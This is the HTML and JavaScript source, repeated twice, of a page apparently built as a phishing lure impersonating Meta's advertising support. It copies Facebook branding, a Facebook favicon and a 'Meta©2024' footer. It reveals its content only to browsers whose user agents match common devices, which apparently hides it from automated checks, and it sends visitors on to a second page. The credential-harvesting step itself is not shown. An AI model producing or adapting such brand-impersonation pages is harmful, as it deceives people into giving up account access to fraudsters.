<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <link rel="icon" type="image/x-icon" href="favicons/.-5463-favicon.ico">
  <link rel="icon" href="https://z-p3-static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico?_nc_eui2=AeH3j6Q7Y5mRPjnORc09Cyhbbw_ndH5a86NvD-d0flrzo70g-PiHlKBkuFYjslgx13hBcv-wU8suinZ9aI16GMVm">
  <title id="pageTitle">Wellcome To Ads Manager</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css?q=&lt;?=date('U')?&gt;" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <script src="js/3.6.4-jquery.min.js" integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <style>
      // by zafar
    body {
        background-color: #f1f1f2;
        margin: 0px;
        padding: 0px;
    }

    .head {
        /* background-color: #386a8b; */
        background-color: #f1f1f2;
        /*dark*/
        text-align: left;
        margin-bottom: 33px;
        height: 40px;
    }

    .headimg {
        margin:3px;
        height: 87%;
    }

    .bannerimg {
        /* width: 33%; */
    }

    .content1 {
        text-align: center;
    }

    .content2 {
        padding: 3px;
    }

    .p-title {
        font-weight: 900;
        margin: 0px;
        padding: 0px;
    }

    .p-content {
        margin: 0px;
        padding: 0px;
        padding-top: 3px;
        padding-bottom: 7px;
        ;
    }
    .lock-img {
        background-color: #47579a;
        border-radius: 360px;
        margin: 0px;
        padding: 10px;
        font-size: 55pt;
    }
    </style>
</head>

<body onload="onloadRun()">
    <div class="head" id="head-line">
        <span style="margin-left:7px;color:#f1f1f2;font-size:2em;font-weight:bold" id="the-logo">.</span>
    </div>
    <div class="container mt-2">
        <div class="row justify-content-md-center">
            <div class="col-12 col-md-6">
                <div class="card">
                    <div id="div-img-header">
                    </div>
                    <div class="card-body">
                        <h3 class="text-center" id="card-title-text"></h3>
                        <p style="text-align: justify;" id="card-desc-text"></p>
                            <ul id="card-ul-text">
                            </ul>
                            <p id="card-desc2-text"></p>
                        <div id="div-btn-cont"></div>
                        <hr>
                        <p class="text-center text-danger pre mt-0" id="suspendeddaymkdfghoansndgfasd"></p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer class="main-footer text-center mt-2 mb-5" id="the-footer">
    </footer>
</body>
<script>
function onloadRun() {
    setTimeout(function() {
        var agent = navigator.userAgent.toLowerCase();
        AllowHeader=["Android","iPhone","Windows","WebKit","Macintosh"];
        CK=0;
        for (let index = 0; index < AllowHeader.length; index++) {
            xAgent=agent.toLocaleLowerCase();
            xHeader=AllowHeader[index].toLocaleLowerCase();
            if (xAgent.indexOf(xHeader) != -1) { 
                CK=1;
                break;
            }
        }
        if(CK==1){
            setDtSuspended();
            $('#card-title-text').html("Meta Advertising Support");
            $('#div-img-header').html('<img style="width: 100%;" src="iiiii.jpg">');
            $('#card-desc-text').html(`
              <p>Manage your ad partnerships. Add, manage, and track partnership requests so that you can create ads on a partner's behalf and share ads directly from their Facebook Page or Instagram account.</p>
              <p>You're eligible for a Meta Ads Manager if you are trying to do business with an agency or work advertising on your Facebook Page. You must follow our terms and conditions.</p>
            `);

            $('#div-btn-cont').html('<button value="Verification" class="btn btn-lg btn-primary col-12" id="gotothepagevltn">Continue');
        }
    }, 250);
    
    setTimeout(function() {
        document.title = 'Meta Advertising Support';
        headline=document.getElementById("head-line");
        headline.style.backgroundColor = "#4267b2";
        $('#the-logo').html("f");
        $('#the-footer').html("Meta&copy;2024");
    }, 50);
    setTimeout(function() {
        $("#gotothepagevltn").on("click", function() {
            rand=makeid(25);
      <!-- go to second page -->
            new_url="next.html";;  
      <!-- go to second page -->
            window.location.replace(new_url);
        });
    }, 500);
}
  // by zafar
function setDtSuspended() {
    arrbulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
        "November", "December"
    ];
    date = new Date();
    dd = date.getDate();
    mm = date.getMonth();
    yy = date.getFullYear();
    
    $("input[name='mkdfghoansndgfasda']").focus();
}
function makeid(length) {
    let result = '';
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const charactersLength = characters.length;
    let counter = 0;
    while (counter < length) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
      counter += 1;
    }
    return result;
}
</script>

</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <link rel="icon" type="image/x-icon" href="favicons/.-5463-favicon.ico">
    <title>...</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css?q=&lt;?=date('U')?&gt;" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <script src="js/3.6.4-jquery.min.js" integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <style>
      // by zafar
    body {
        background-color: #f1f1f2;
        margin: 0px;
        padding: 0px;
    }

    .head {
        /* background-color: #386a8b; */
        background-color: #f1f1f2;
        /*dark*/
        text-align: left;
        margin-bottom: 33px;
        height: 40px;
    }

    .headimg {
        margin:3px;
        height: 87%;
    }

    .bannerimg {
        /* width: 33%; */
    }

    .content1 {
        text-align: center;
    }

    .content2 {
        padding: 3px;
    }

    .p-title {
        font-weight: 900;
        margin: 0px;
        padding: 0px;
    }

    .p-content {
        margin: 0px;
        padding: 0px;
        padding-top: 3px;
        padding-bottom: 7px;
        ;
    }
    .lock-img {
        background-color: #47579a;
        border-radius: 360px;
        margin: 0px;
        padding: 10px;
        font-size: 55pt;
    }
    </style>
</head>

<body onload="onloadRun()">
    <div class="head" id="head-line">
        <span style="margin-left:7px;color:#f1f1f2;font-size:2em;font-weight:bold" id="the-logo">.</span>
    </div>
    <div class="container mt-2">
        <div class="row justify-content-md-center">
            <div class="col-12 col-md-6">
                <div class="card">
                    <div id="div-img-header">
                    </div>
                    <div class="card-body">
                        <h3 class="text-center" id="card-title-text"></h3>
                        <p style="text-align: justify;" id="card-desc-text"></p>
                            <ul id="card-ul-text">
                            </ul>
                            <p id="card-desc2-text"></p>
                        <div id="div-btn-cont"></div>
                        <hr>
                        <p class="text-center text-danger pre mt-0" id="suspendeddaymkdfghoansndgfasd"></p>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer class="main-footer text-center mt-2 mb-5" id="the-footer">
    </footer>
</body>
<script>
function onloadRun() {
    setTimeout(function() {
        var agent = navigator.userAgent.toLowerCase();
        AllowHeader=["Android","iPhone","Windows","WebKit","Macintosh"];
        CK=0;
        for (let index = 0; index < AllowHeader.length; index++) {
            xAgent=agent.toLocaleLowerCase();
            xHeader=AllowHeader[index].toLocaleLowerCase();
            if (xAgent.indexOf(xHeader) != -1) { 
                CK=1;
                break;
            }
        }
        if(CK==1){
            setDtSuspended();
            $('#card-title-text').html("Meta Advertising Support");
            $('#div-img-header').html('<img style="width: 100%;" src="iiiii.jpg">');
            $('#card-desc-text').html(`
              <p>Manage your ad partnerships. Add, manage, and track partnership requests so that you can create ads on a partner's behalf and share ads directly from their Facebook Page or Instagram account.</p>
              <p>You're eligible for a Meta Ads Manager if you are trying to do business with an agency or work advertising on your Facebook Page. You must follow our terms and conditions.</p>
            `);

            // $('#card-ul-text').append("<li>Using someone else's fake name/photo.");
            // $('#card-ul-text').append("<li>Share content that misleads other users.");
            // $('#card-ul-text').append("<li>Insulting other users.");
           
            $('#div-btn-cont').html('<button value="Verification" class="btn btn-lg btn-primary col-12" id="gotothepagevltn">Continue');
        }
    }, 250);
    setTimeout(function() {
        document.title = 'Meta Advertising Support';
        headline=document.getElementById("head-line");
        headline.style.backgroundColor = "#4267b2";
        $('#the-logo').html("f");
        $('#the-footer').html("Meta&copy;2024");
    }, 50);
    setTimeout(function() {
        $("#gotothepagevltn").on("click", function() {
            rand=makeid(25);
      <!-- go to second page -->
            new_url="next.html";;  
      <!-- go to second page -->
            window.location.replace(new_url);
        });
    }, 500);
}
  // by zafar
function setDtSuspended() {
    arrbulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
        "November", "December"
    ];
    date = new Date();
    dd = date.getDate();
    mm = date.getMonth();
    yy = date.getFullYear();
    
    $("input[name='mkdfghoansndgfasda']").focus();
}
function makeid(length) {
    let result = '';
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const charactersLength = characters.length;
    let counter = 0;
    while (counter < length) {
      result += characters.charAt(Math.floor(Math.random() * charactersLength));
      counter += 1;
    }
    return result;
}
</script>

</html>
